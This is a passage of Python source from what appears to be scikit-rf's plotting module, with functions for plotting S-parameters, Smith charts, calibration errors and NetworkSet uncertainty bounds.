This is accomplished by calling\n:func:`plot_vs_frequency_generic`\n\nExamples\n--------\n>>> myntwk.plot_{}(m=1,n=0,color='r')\n\"\"\".format(prop_name, prop_name)\n\n # setattr(self.__class__,'plot_%s_complex'%(prop_name), \\\n setattr(self,'plot_%s_complex'%(prop_name), \\\n plot_prop_rect)\n\n\n for func_name in COMPONENT_FUNC_DICT:\n attribute = f'{prop_name}_{func_name}'\n y_label = Y_LABEL_DICT[func_name]\n\n def plot_func(self, m=None, n=None, ax=None,\n show_legend=True, attribute=attribute,\n y_label=y_label, logx=False, pad=0, window='hamming', z0=50, *args, **kwargs):\n\n # create index lists, if not provided by user\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n gen_label = True\n else:\n gen_label = False\n\n #TODO: turn off interactive plotting for performance\n # this didnt work because it required a show()\n # to be called, which in turn, disrupted testCases\n #\n # was_interactive = plt.isinteractive\n # if was_interactive:\n # plt.interactive(False)\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks\n # name if it exists, and they didn't pass a name key in\n # the kwargs\n if gen_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$%s_{%i%i}$'%\\\n (attribute[0].upper(),m+1,n+1)\n else:\n label_string = '%s%i%i'%\\\n (attribute[0].upper(),m+1,n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $%s_{%i%i}$'%\\\n (attribute[0].upper(),m+1,n+1)\n else:\n label_string = self.name+', %s%i%i'%\\\n (attribute[0].upper(),m+1,n+1)\n kwargs['label'] = label_string\n\n # quick and dirty way to plot step and impulse response\n if 'time_impulse' in attribute:\n xlabel = 'Time (ns)'\n x,y = self.impulse_response(pad=pad, window=window)\n # default is reflexion coefficient axis\n if attribute[0].lower() == 'z':\n # if they want impedance axis, give it to them\n y_label = 'Z (ohm)'\n y[x == 1.] = 1. + 1e-12 # solve numerical singularity\n y[x == -1.] = -1. + 1e-12 # solve numerical singularity\n y = z0 * (1+y) / (1-y)\n plot_rectangular(x=x * 1e9,\n y=y,\n x_label=xlabel,\n y_label=y_label,\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n elif 'time_step' in attribute:\n xlabel = 'Time (ns)'\n x, y = self.step_response(pad=pad, window=window)\n # default is reflexion coefficient axis\n if attribute[0].lower() == 'z':\n # if they want impedance axis, give it to them\n y_label = 'Z (ohm)'\n y[x == 1.] = 1. + 1e-12 # solve numerical singularity\n y[x == -1.] = -1. 
+ 1e-12 # solve numerical singularity\n y = z0 * (1+y) / (1-y)\n plot_rectangular(x=x * 1e9,\n y=y,\n x_label=xlabel,\n y_label=y_label,\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n\n else:\n # plot the desired attribute vs frequency\n if 'time' in attribute:\n xlabel = 'Time (ns)'\n x = self.frequency.t_ns\n\n else:\n xlabel = 'Frequency (%s)' % self.frequency.unit\n # x = self.frequency.f_scaled\n x = self.frequency.f # always plot f, and then scale the ticks instead\n\n # scale the ticklabels according to the frequency unit and set log-scale if desired:\n if ax is None:\n ax = plt.gca()\n if logx:\n ax.set_xscale('log')\n\n scale_frequency_ticks(ax, self.frequency.unit)\n\n\n\n plot_rectangular(x=x,\n y=getattr(self, attribute)[:, m, n],\n x_label=xlabel,\n y_label=y_label,\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n #if was_interactive:\n # plt.interactive(True)\n # plt.draw()\n # #plt.show()\n\n plot_func.__doc__ = r\"\"\"\n Plot the Network attribute :attr:`%s` vs frequency.\n\n Parameters\n ----------\n m : int, optional\n first index of s-parameter matrix, if None will use all\n n : int, optional\n second index of the s-parameter matrix, if None will use all\n ax : :class:`matplotlib.Axes` object, optional\n An existing Axes object to plot on\n show_legend : Boolean\n draw legend or not\n attribute : string\n Network attribute to plot\n y_label : string, optional\n the y-axis label\n logx : Boolean, optional\n Enable logarithmic x-axis, default off\n\n \\*args,\\**kwargs : arguments, keyword arguments\n passed to :func:`matplotlib.plot`\n\n Note\n ----\n This function is dynamically generated upon Network\n initialization. This is accomplished by calling\n :func:`plot_vs_frequency_generic`\n\n Examples\n --------\n >>> myntwk.plot_%s(m=1,n=0,color='r')\n \"\"\"%(attribute,attribute)\n\n # setattr(self.__class__,'plot_%s'%(attribute), \\\n setattr(self,'plot_%s'%(attribute), \\\n plot_func)\n\n\ndef labelXAxis(self, ax: Union[plt.Axes, None] = None):\n \"\"\"\n Label the x-axis of a plot.\n\n Sets the labels of a plot using :func:`matplotlib.x_label` with\n string containing the frequency unit.\n\n Parameters\n ----------\n ax : :class:`matplotlib.Axes` or None, optional\n Axes on which to label the plot.\n Defaults is None, for the current axe\n returned by :func:`matplotlib.gca()`\n \"\"\"\n if ax is None:\n ax = plt.gca()\n ax.set_xlabel('Frequency (%s)' % self.unit)\n\n\ndef plot_v_frequency(self, y: NumberLike, *args, **kwargs):\n \"\"\"\n Plot something vs this frequency.\n\n This plots whatever is given vs. 
`self.f_scaled` and then\n calls `labelXAxis`.\n \"\"\"\n\n try:\n if len(npy.shape(y)) > 2:\n # perhaps the dimensions are empty, try to squeeze it down\n y = y.squeeze()\n if len(npy.shape(y)) > 2:\n # the dimensions are full, so lets loop and plot each\n for m in range(npy.shape(y)[1]):\n for n in range(npy.shape(y)[2]):\n self.plot(y[:, m, n], *args, **kwargs)\n return\n if len(y) == len(self):\n pass\n else:\n\n raise IndexError(['thing to plot doesn\\'t have same'\n ' number of points as f'])\n except(TypeError):\n y = y * npy.ones(len(self))\n\n # plt.plot(self.f_scaled, y, *args, **kwargs)\n plt.plot(self.f, y, *args, **kwargs)\n ax = plt.gca()\n scale_frequency_ticks(ax, self.unit)\n plt.autoscale(axis='x', tight=True)\n self.labelXAxis()\n\n\n## specific plotting functions\ndef plot(self, *args, **kw):\n \"\"\"\n Plot something vs frequency\n \"\"\"\n return self.frequency.plot(*args, **kw)\n\n\ndef plot_passivity(self, port=None, label_prefix=None, *args, **kwargs):\n \"\"\"\n Plot dB(diag(passivity metric)) vs frequency.\n\n Note\n ----\n This plot does not completely capture the passivity metric, which\n is a test for `unitary-ness` of the s-matrix. However, it may\n be used to display a measure of power dissipated in a network.\n\n See Also\n --------\n passivity\n \"\"\"\n name = '' if self.name is None else self.name\n\n if port is None:\n ports = range(self.nports)\n else:\n ports = [port]\n for k in ports:\n if label_prefix is None:\n label = name + ', port %i' % (k + 1)\n else:\n label = label_prefix + ', port %i' % (k + 1)\n self.frequency.plot(mf.complex_2_db(self.passivity[:, k, k]),\n label=label,\n *args, **kwargs)\n\n plt.legend()\n plt.draw()\n\n\ndef plot_reciprocity(self, db=False, *args, **kwargs):\n \"\"\"\n Plot reciprocity metric.\n\n See Also\n --------\n reciprocity\n \"\"\"\n for m in range(self.nports):\n for n in range(self.nports):\n if m > n:\n if 'label' not in kwargs.keys():\n kwargs['label'] = 'ports %i%i' % (m, n)\n y = self.reciprocity[:, m, n].flatten()\n if db:\n y = mf.complex_2_db(y)\n self.frequency.plot(y, *args, **kwargs)\n\n plt.legend()\n plt.draw()\n\n\ndef plot_reciprocity2(self, db=False, *args, **kwargs):\n \"\"\"\n Plot reciprocity metric #2.\n\n This is distance of the determinant of the wave-cascading matrix\n from unity.\n\n .. math::\n\n abs(1 - S/S^T )\n\n\n\n See Also\n --------\n reciprocity\n \"\"\"\n for m in range(self.nports):\n for n in range(self.nports):\n if m > n:\n if 'label' not in kwargs.keys():\n kwargs['label'] = 'ports %i%i' % (m, n)\n y = self.reciprocity2[:, m, n].flatten()\n if db:\n y = mf.complex_2_db(y)\n self.frequency.plot(y, *args, **kwargs)\n\n plt.legend()\n plt.draw()\n\n\ndef plot_s_db_time(self, *args, window: Union[str, float, Tuple[str, float]]=('kaiser', 6),\n normalize: bool = True, center_to_dc: bool = None, **kwargs):\n return self.windowed(window, normalize, center_to_dc).plot_s_time_db(*args,**kwargs)\n\n\n# plotting\ndef plot_s_smith(self, m=None, n=None,r=1, ax=None, show_legend=True,\\\n chart_type='z', draw_labels=False, label_axes=False, draw_vswr=None, *args,**kwargs):\n r\"\"\"\n Plots the scattering parameter on a smith chart.\n\n Plots indices `m`, `n`, where `m` and `n` can be integers or\n lists of integers.\n\n\n Parameters\n ----------\n m : int, optional\n first index\n n : int, optional\n second index\n ax : matplotlib.Axes object, optional\n axes to plot on. 
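# The reflection-to-impedance mapping used by the time-domain 'z' plots
# generated above: Z = z0 * (1 + gamma) / (1 - gamma). A matched load
# (gamma = 0) gives z0, and a short (gamma = -1) gives 0 ohm.
import numpy as npy

z0 = 50
gamma = npy.array([0.0, 0.5, -1.0])
print(z0 * (1 + gamma) / (1 - gamma))   # -> [ 50. 150.   0.]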
in case you want to update an existing\n plot.\n show_legend : boolean, optional\n to turn legend show legend of not, optional\n chart_type : ['z','y']\n draw impedance or admittance contours\n draw_labels : Boolean\n annotate chart with impedance values\n label_axes : Boolean\n Label axis with titles `Real` and `Imaginary`\n border : Boolean\n draw rectangular border around image with ticks\n draw_vswr : list of numbers, Boolean or None\n draw VSWR circles. If True, default values are used.\n\n \\*args : arguments, optional\n passed to the matplotlib.plot command\n \\*\\*kwargs : keyword arguments, optional\n passed to the matplotlib.plot command\n\n\n See Also\n --------\n plot_vs_frequency_generic - generic plotting function\n smith - draws a smith chart\n\n Examples\n --------\n >>> myntwk.plot_s_smith()\n >>> myntwk.plot_s_smith(m=0,n=1,color='b', marker='x')\n \"\"\"\n # TODO: prevent this from re-drawing smith chart if one alread\n # exists on current set of axes\n\n # get current axis if user doesnt supply and axis\n if ax is None:\n ax = plt.gca()\n\n\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n generate_label=True\n else:\n generate_label=False\n\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks name if it\n # exists, and they didnt pass a name key in the kwargs\n if generate_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$S_{'+repr(m+1) + repr(n+1)+'}$'\n else:\n label_string = 'S'+repr(m+1) + repr(n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $S_{'+repr(m+1) + \\\n repr(n+1)+'}$'\n else:\n label_string = self.name+', S'+repr(m+1) + repr(n+1)\n\n kwargs['label'] = label_string\n\n # plot the desired attribute vs frequency\n if len (ax.patches) == 0:\n smith(ax=ax, smithR = r, chart_type=chart_type, draw_labels=draw_labels, draw_vswr=draw_vswr)\n ax.plot(self.s[:,m,n].real, self.s[:,m,n].imag, *args,**kwargs)\n\n #draw legend\n if show_legend:\n ax.legend()\n ax.axis(npy.array([-1.1,1.1,-1.1,1.1])*r)\n\n if label_axes:\n ax.set_xlabel('Real')\n ax.set_ylabel('Imaginary')\n\n\ndef plot_it_all(self, *args, **kwargs):\n r\"\"\"\n Plot dB, deg, smith, and complex in subplots.\n\n Plots the magnitude in dB in subplot 1, the phase in degrees in\n subplot 2, a smith chart in subplot 3, and a complex plot in\n subplot 4.\n\n Parameters\n ----------\n \\*args : arguments, optional\n passed to the matplotlib.plot command\n \\*\\*kwargs : keyword arguments, optional\n passed to the matplotlib.plot command\n\n See Also\n --------\n plot_s_db - plot magnitude (in dB) of s-parameters vs frequency\n plot_s_deg - plot phase of s-parameters (in degrees) vs frequency\n plot_s_smith - plot complex s-parameters on smith chart\n plot_s_complex - plot complex s-parameters in the complex plane\n\n Examples\n --------\n >>> from skrf.data import ring_slot\n >>> ring_slot.plot_it_all()\n \"\"\"\n plt.subplot(221)\n getattr(self,'plot_s_db')(*args, **kwargs)\n plt.subplot(222)\n getattr(self,'plot_s_deg')(*args, **kwargs)\n plt.subplot(223)\n getattr(self,'plot_s_smith')(*args, **kwargs)\n plt.subplot(224)\n getattr(self,'plot_s_complex')(*args, **kwargs)\n\n\ndef stylely(rc_dict: dict = {}, style_file: str = 'skrf.mplstyle'):\n \"\"\"\n Loads the rc-params from the specified file (file must be located in skrf/data).\n\n Parameters\n ----------\n rc_dict : dict, optional\n rc 
dict passed to :func:`matplotlib.rc`, by default {}\n style_file : str, optional\n style file, by default 'skrf.mplstyle'\n \"\"\"\n from .data import pwd # delayed to solve circular import\n mpl.style.use(os.path.join(pwd, style_file))\n mpl.rc(rc_dict)\n\n\ndef plot_calibration_errors(self, *args, **kwargs):\n \"\"\"\n Plot biased, unbiased and total error in dB scaled.\n\n See Also\n --------\n biased_error\n unbiased_error\n total_error\n \"\"\"\n port_list = self.biased_error.port_tuples\n for m,n in port_list:\n plt.figure()\n plt.title('S%i%i'%(m+1,n+1))\n self.unbiased_error.plot_s_db(m,n,**kwargs)\n self.biased_error.plot_s_db(m,n,**kwargs)\n self.total_error.plot_s_db(m,n,**kwargs)\n plt.ylim(-100,0)\n\n\ndef plot_caled_ntwks(self, attr: str = 's_smith', show_legend: bool = False, **kwargs):\n r\"\"\"\n Plot corrected calibration standards.\n\n Given that the calibration is overdetermined, this may be used\n as a heuristic verification of calibration quality.\n\n Parameters\n ----------\n attr : str\n Network property to plot, ie 's_db', 's_smith', etc.\n Default is 's_smith'\n show_legend : bool, optional\n draw a legend or not. Default is False.\n \\*\\*kwargs : kwargs\n passed to the plot method of Network\n \"\"\"\n ns = networkSet.NetworkSet(self.caled_ntwks)\n kwargs.update({'show_legend':show_legend})\n\n if ns[0].nports ==1:\n ns.__getattribute__('plot_'+attr)(0,0, **kwargs)\n elif ns[0].nports ==2:\n plt.figure(figsize = (8,8))\n for k,mn in enumerate([(0, 0), (1, 1), (0, 1), (1, 0)]):\n plt.subplot(221+k)\n plt.title('S%i%i'%(mn[0]+1,mn[1]+1))\n ns.__getattribute__('plot_'+attr)(*mn, **kwargs)\n else:\n raise NotImplementedError\n plt.tight_layout()\n\n\ndef plot_residuals(self, attr: str = 's_db', **kwargs):\n r\"\"\"\n Plot residual networks.\n\n Given that the calibration is overdetermined, this may be used\n as a metric of the calibration's *goodness of fit*\n\n Parameters\n ----------\n attr : str, optional.\n Network property to plot, ie 's_db', 's_smith', etc.\n Default is 's_db'\n \\*\\*kwargs : kwargs\n passed to the plot method of Network\n\n See Also\n --------\n Calibration.residual_networks\n \"\"\"\n\n networkSet.NetworkSet(self.residual_ntwks).__getattribute__('plot_'+attr)(**kwargs)\n\n\n# Network Set Plotting Commands\ndef animate(self, attr: str = 's_deg', ylims: Tuple = (-5, 5),\n xlims: Union[Tuple, None] = None, show: bool = True,\n savefigs: bool = False, dir_: str = '.', *args, **kwargs):\n r\"\"\"\n Animate a property of the networkset.\n\n This loops through all elements in the NetworkSet and calls\n a plotting attribute (ie Network.plot_`attr`), with given \\*args\n and \\*\\*kwargs.\n\n Parameters\n ----------\n attr : str, optional\n plotting property of a Network (ie 's_db', 's_deg', etc)\n Default is 's_deg'\n ylims : tuple, optional\n passed to ylim. needed to have consistent y-limits across frames.\n Default is (-5 ,5).\n xlims : tuple or None, optional.\n passed to xlim. Default is None.\n show : bool, optional\n show each frame as its animated. Default is True.\n savefigs : bool, optional\n save each frame as a png. 
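# Usage sketch for the stylely() helper above: load the packaged rc style once,
# then plot as usual (assumes skrf is importable; ring_slot is its bundled
# example network, as used elsewhere in this module's docstrings).
import skrf as rf
from skrf.data import ring_slot

rf.stylely()            # applies skrf/data/skrf.mplstyle through matplotlib
ring_slot.plot_s_db()   # subsequent plots pick up the rc parameters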
Default is False.\n\n \\*args, \\*\\*kwargs :\n passed to the Network plotting function\n\n Note\n ----\n using `label=None` will speed up animation significantly,\n because it prevents the legend from drawing\n\n to create video paste this:\n\n !avconv -r 10 -i out_%5d.png -vcodec huffyuv out.avi\n\n or (depending on your ffmpeg version)\n\n !ffmpeg -r 10 -i out_%5d.png -vcodec huffyuv out.avi\n\n Examples\n --------\n >>> ns.animate('s_deg', ylims=(-5,5), label=None)\n\n \"\"\"\n was_interactive = plt.isinteractive()\n plt.ioff()\n\n for idx, k in enumerate(self):\n plt.clf()\n if 'time' in attr:\n tmp_ntwk = k.windowed()\n tmp_ntwk.__getattribute__('plot_' + attr)(*args, **kwargs)\n else:\n k.__getattribute__('plot_' + attr)(*args, **kwargs)\n if ylims is not None:\n plt.ylim(ylims)\n if xlims is not None:\n plt.xlim(xlims)\n # rf.legend_off()\n plt.draw()\n if show:\n plt.show()\n if savefigs:\n fname = os.path.join(dir_, 'out_%.5i' % idx + '.png')\n plt.savefig(fname)\n\n if savefigs:\n print('\\n\\n')\n if was_interactive:\n plt.ion()\n\n\n#------------------------------\n#\n# NetworkSet plotting functions\n#\n#------------------------------\n\ndef plot_uncertainty_bounds_component(\n self, attribute: str,\n m: Union[int, None] = None, n: Union[int, None] = None,\n type: str = 'shade', n_deviations: int = 3,\n alpha: float = .3, color_error: Union[str, None] = None,\n markevery_error: int = 20, ax: Union[plt.Axes, None] = None,\n ppf: bool = None, kwargs_error: dict = {},\n *args, **kwargs):\n r\"\"\"\n Plot mean value of a NetworkSet with +/- uncertainty bounds in an Network's attribute.\n\n This is designed to represent uncertainty in a scalar component of the s-parameter.\n for example plotting the uncertainty in the magnitude would be expressed by,\n\n .. math::\n\n mean(|s|) \\pm std(|s|)\n\n The order of mean and abs is important.\n\n\n Parameters\n ----------\n attribute : str\n attribute of Network type to analyze\n m : int or None\n first index of attribute matrix. Default is None (all)\n n : int or None\n second index of attribute matrix. Default is None (all)\n type : str\n ['shade' | 'bar'], type of plot to draw\n n_deviations : int\n number of std deviations to plot as bounds\n alpha : float\n passed to matplotlib.fill_between() command. [number, 0-1]\n color_error : str\n color of the +- std dev fill shading. Default is None.\n markevery_error : float\n tbd\n type : str\n if type=='bar', this controls frequency of error bars\n ax : matplotlib axe object\n Axes to plot on. Default is None.\n ppf : function\n post processing function. a function applied to the\n upper and lower bounds. Default is None\n kwargs_error : dict\n dictionary of kwargs to pass to the fill_between or\n errorbar plot command depending on value of type.\n \\*args, \\*\\*kwargs :\n passed to Network.plot_s_re command used to plot mean response\n\n Note\n ----\n For phase uncertainty you probably want s_deg_unwrap, or\n similar. 
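# The statistic the shaded plot represents, computed directly with numpy over a
# synthetic stack of |s| samples (rows: networks in the set, columns: frequencies).
import numpy as np

s_mag = np.abs(np.random.randn(10, 201) + 1j * np.random.randn(10, 201))
mean, std = s_mag.mean(axis=0), s_mag.std(axis=0)
upper, lower = mean + 3 * std, mean - 3 * std   # n_deviations=3, the default above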
uncertainty for wrapped phase blows up at +-pi.\n\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n if m is None:\n M = range(self[0].number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self[0].number_of_ports)\n else:\n N = [n]\n\n for m in M:\n for n in N:\n\n plot_attribute = attribute\n\n ntwk_mean = self.__getattribute__('mean_'+attribute)\n ntwk_std = self.__getattribute__('std_'+attribute)\n ntwk_std.s = n_deviations * ntwk_std.s\n\n upper_bound = (ntwk_mean.s[:, m, n] + ntwk_std.s[:, m, n]).squeeze()\n lower_bound = (ntwk_mean.s[:, m, n] - ntwk_std.s[:, m, n]).squeeze()\n\n if ppf is not None:\n if type == 'bar':\n raise NotImplementedError('the \\'ppf\\' options don\\'t work correctly with the bar-type error plots')\n ntwk_mean.s = ppf(ntwk_mean.s)\n upper_bound = ppf(upper_bound)\n lower_bound = ppf(lower_bound)\n lower_bound[npy.isnan(lower_bound)] = min(lower_bound)\n if ppf in [mf.magnitude_2_db, mf.mag_2_db]: # quickfix of wrong ylabels due to usage of ppf for *_db plots\n if attribute == 's_mag':\n plot_attribute = 's_db'\n elif attribute == 's_time_mag':\n plot_attribute = 's_time_db'\n\n if type == 'shade':\n ntwk_mean.plot_s_re(ax=ax, m=m, n=n, *args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.fill_between(ntwk_mean.frequency.f,\n lower_bound.real, upper_bound.real, alpha=alpha, color=color_error,\n **kwargs_error)\n # ax.plot(ntwk_mean.frequency.f_scaled, ntwk_mean.s[:,m,n],*args,**kwargs)\n\n elif type == 'bar':\n ntwk_mean.plot_s_re(ax=ax, m=m, n=n, *args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.errorbar(ntwk_mean.frequency.f[::markevery_error],\n ntwk_mean.s_re[:, m, n].squeeze()[::markevery_error],\n yerr=ntwk_std.s_mag[:, m, n].squeeze()[::markevery_error],\n color=color_error, **kwargs_error)\n\n else:\n raise(ValueError('incorrect plot type'))\n\n ax.set_ylabel(Y_LABEL_DICT.get(plot_attribute[2:], '')) # use only the function of the attribute\n scale_frequency_ticks(ax, ntwk_mean.frequency.unit)\n ax.axis('tight')\n\n\ndef plot_minmax_bounds_component(self, attribute: str, m: int = 0, n: int = 0,\n type: str = 'shade', n_deviations: int = 3,\n alpha: float = .3, color_error: Union[str, None] = None,\n markevery_error: int = 20, ax: Union[plt.Axes, None] = None,\n ppf: bool = None, kwargs_error: dict = {},\n *args, **kwargs):\n r\"\"\"\n Plots mean value of the NetworkSet with +/- uncertainty bounds in an Network's attribute.\n\n This is designed to represent uncertainty in a scalar component of the s-parameter. For example\n plotting the uncertainty in the magnitude would be expressed by\n\n .. math::\n\n mean(|s|) \\pm std(|s|)\n\n The order of mean and abs is important.\n\n Parameters\n ----------\n attribute : str\n attribute of Network type to analyze\n m : int\n first index of attribute matrix\n n : int\n second index of attribute matrix\n type : str\n ['shade' | 'bar'], type of plot to draw\n n_deviations : int\n number of std deviations to plot as bounds\n alpha : float\n passed to matplotlib.fill_between() command. [number, 0-1]\n color_error : str\n color of the +- std dev fill shading. Default is None.\n markevery_error : float\n tbd\n type : str\n if type=='bar', this controls frequency of error bars\n ax : matplotlib axe object\n Axes to plot on. Default is None.\n ppf : function\n post processing function. a function applied to the\n upper and lower bounds. 
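# What the 'ppf' hook does to the bounds: a post-processing function such as a
# magnitude-to-dB conversion, akin to mf.magnitude_2_db used in the *_db
# wrappers further down (stand-in implementation for illustration).
import numpy as np

def magnitude_2_db(x):
    return 20 * np.log10(x)

print(magnitude_2_db(np.array([1.0, 0.5, 0.1])))   # [  0.    -6.02  -20.  ]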
Default is None\n kwargs_error : dict\n dictionary of kwargs to pass to the fill_between or\n errorbar plot command depending on value of type.\n \\*args, \\*\\*kwargs :\n passed to Network.plot_s_re command used to plot mean response\n\n Note\n ----\n For phase uncertainty you probably want s_deg_unwrap, or\n similar. Uncertainty for wrapped phase blows up at +-pi.\n\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n ntwk_mean = self.__getattribute__('mean_'+attribute)\n ntwk_std = self.__getattribute__('std_'+attribute)\n\n lower_bound = self.__getattribute__('min_'+attribute).s_re[:,m,n].squeeze()\n upper_bound = self.__getattribute__('max_'+attribute).s_re[:,m,n].squeeze()\n\n if ppf is not None:\n if type =='bar':\n raise NotImplementedError('the \\'ppf\\' options don\\'t work correctly with the bar-type error plots')\n ntwk_mean.s = ppf(ntwk_mean.s)\n upper_bound = ppf(upper_bound)\n lower_bound = ppf(lower_bound)\n lower_bound[npy.isnan(lower_bound)]=min(lower_bound)\n if ppf in [mf.magnitude_2_db, mf.mag_2_db]: # quickfix of wrong ylabels due to usage of ppf for *_db plots\n if attribute == 's_mag':\n attribute = 's_db'\n elif attribute == 's_time_mag':\n attribute = 's_time_db'\n\n if type == 'shade':\n ntwk_mean.plot_s_re(ax=ax,m=m,n=n,*args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.fill_between(ntwk_mean.frequency.f,\n lower_bound, upper_bound, alpha=alpha, color=color_error,\n **kwargs_error)\n #ax.plot(ntwk_mean.frequency.f_scaled,ntwk_mean.s[:,m,n],*args,**kwargs)\n elif type =='bar':\n raise (NotImplementedError)\n ntwk_mean.plot_s_re(ax=ax, m=m, n=n, *args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.errorbar(ntwk_mean.frequency.f[::markevery_error],\n ntwk_mean.s_re[:,m,n].squeeze()[::markevery_error],\n yerr=ntwk_std.s_mag[:,m,n].squeeze()[::markevery_error],\n color=color_error,**kwargs_error)\n\n else:\n raise(ValueError('incorrect plot type'))\n\n ax.set_ylabel(Y_LABEL_DICT.get(attribute[2:], '')) # use only the function of the attribute\n scale_frequency_ticks(ax, ntwk_mean.frequency.unit)\n ax.axis('tight')\n\n\ndef plot_uncertainty_bounds_s_db(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute='s_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_mag','ppf':mf.magnitude_2_db})\n self.plot_uncertainty_bounds_component(*args,**kwargs)\n\ndef plot_minmax_bounds_s_db(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_mag','ppf':mf.magnitude_2_db})\n self.plot_minmax_bounds_component(*args,**kwargs)\n\ndef plot_minmax_bounds_s_db10(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n see plot_uncertainty_bounds for help\n\n \"\"\"\n kwargs.update({'attribute':'s_mag','ppf':mf.mag_2_db10})\n self.plot_minmax_bounds_component(*args,**kwargs)\n\ndef plot_uncertainty_bounds_s_time_db(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_time_mag','ppf':mf.magnitude_2_db})\n self.plot_uncertainty_bounds_component(*args,**kwargs)\n\ndef plot_minmax_bounds_s_time_db(self, *args, **kwargs):\n 
\"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_time_mag','ppf':mf.magnitude_2_db})\n self.plot_minmax_bounds_component(*args, **kwargs)\n\ndef plot_uncertainty_decomposition(self, m: int = 0, n: int = 0):\n \"\"\"\n Plot the total and component-wise uncertainty.\n\n Parameters\n ----------\n m : int\n first s-parameters index\n n :\n second s-parameter index\n\n \"\"\"\n if self.name is not None:\n plt.title(r'Uncertainty Decomposition: %s $S_{%i%i}$'%(self.name,m,n))\n self.std_s.plot_s_mag(label='Distance', m=m,n=n)\n self.std_s_re.plot_s_mag(label='Real', m=m,n=n)\n self.std_s_im.plot_s_mag(label='Imaginary', m=m,n=n)\n self.std_s_mag.plot_s_mag(label='Magnitude', m=m,n=n)\n self.std_s_arcl.plot_s_mag(label='Arc-length', m=m,n=n)\n\ndef plot_uncertainty_bounds_s(self, multiplier: float = 200, *args, **kwargs):\n \"\"\"\n Plot complex uncertainty bounds plot on smith chart.\n\n This function plots the complex uncertainty of a NetworkSet\n as circles on the smith chart. At each frequency a circle\n with radii proportional to the complex standard deviation\n of the set at that frequency is drawn. Due to the fact that\n the `markersize` argument is in pixels, the radii can scaled by\n the input argument `multiplier`.\n\n default kwargs are\n {\n 'marker':'o',\n 'color':'b',\n 'mew':0,\n 'ls':'',\n 'alpha':.1,\n 'label':None,\n }\n\n Parameters\n ----------\n multiplier : float\n controls the circle sizes, by multiples of the standard\n deviation.\n\n \"\"\"\n default_kwargs = {\n 'marker':'o',\n 'color':'b',\n 'mew':0,\n 'ls':'',\n 'alpha':.1,\n 'label':None,\n }\n default_kwargs.update(**kwargs)\n\n if plt.isinteractive():\n was_interactive = True\n plt.interactive(0)\n else:\n was_interactive = False\n\n [self.mean_s[k].plot_s_smith(*args, ms = self.std_s[k].s_mag*multiplier, **default_kwargs) for k in range(len(self[0]))]\n\n if was_interactive:\n plt.interactive(1)\n plt.draw()\n plt.show()\n\ndef plot_logsigma(self, label_axis: bool = True, *args,**kwargs):\n r\"\"\"\n Plot the uncertainty for the set in units of log-sigma.\n\n Log-sigma is the complex standard deviation, plotted in units\n of dB's.\n\n Parameters\n ----------\n label_axis : bool, optional\n Default is True.\n \\*args, \\*\\*kwargs : arguments\n passed to self.std_s.plot_s_db()\n \"\"\"\n self.std_s.plot_s_db(*args,**kwargs)\n if label_axis:\n plt.ylabel('Standard Deviation(dB)')\n\n\ndef signature(self, m: int = 0, n: int = 0, component: str = 's_mag',\n vmax: Union[Number, None] = None, vs_time: bool = False,\n cbar_label: Union[str, None] = None,\n *args, **kwargs):\n r\"\"\"\n Visualization of a NetworkSet.\n\n Creates a colored image representing the some component\n of each Network in the NetworkSet, vs frequency.\n\n Parameters\n ------------\n m : int, optional\n first s-parameters index. Default is 0.\n n : int, optional\n second s-parameter index. Default is 0.\n component : ['s_mag','s_db','s_deg' ..]\n scalar component of Network to visualize. should\n be a property of the Network object.\n vmax : number or None.\n sets upper limit of colorbar, if None, will be set to\n 3*mean of the magnitude of the complex difference.\n Default is None.\n vs_time: Boolean, optional.\n if True, then we assume each Network.name was made with\n rf.now_string, and we make the y-axis a datetime axis.\n Default is False.\n cbar_label: String or None, optional\n label for the colorbar. 
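# Standalone sketch of what signature() assembles in the body that follows:
# a (networks x frequency-points) matrix of one scalar component, rendered
# with imshow; the data here is synthetic.
import numpy as np
import matplotlib.pyplot as plt

mat = np.random.rand(20, 201)   # 20 networks, 201 frequency points
plt.imshow(mat, aspect='auto', interpolation='nearest')
plt.ylabel('Network #')
plt.colorbar()
plt.show()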
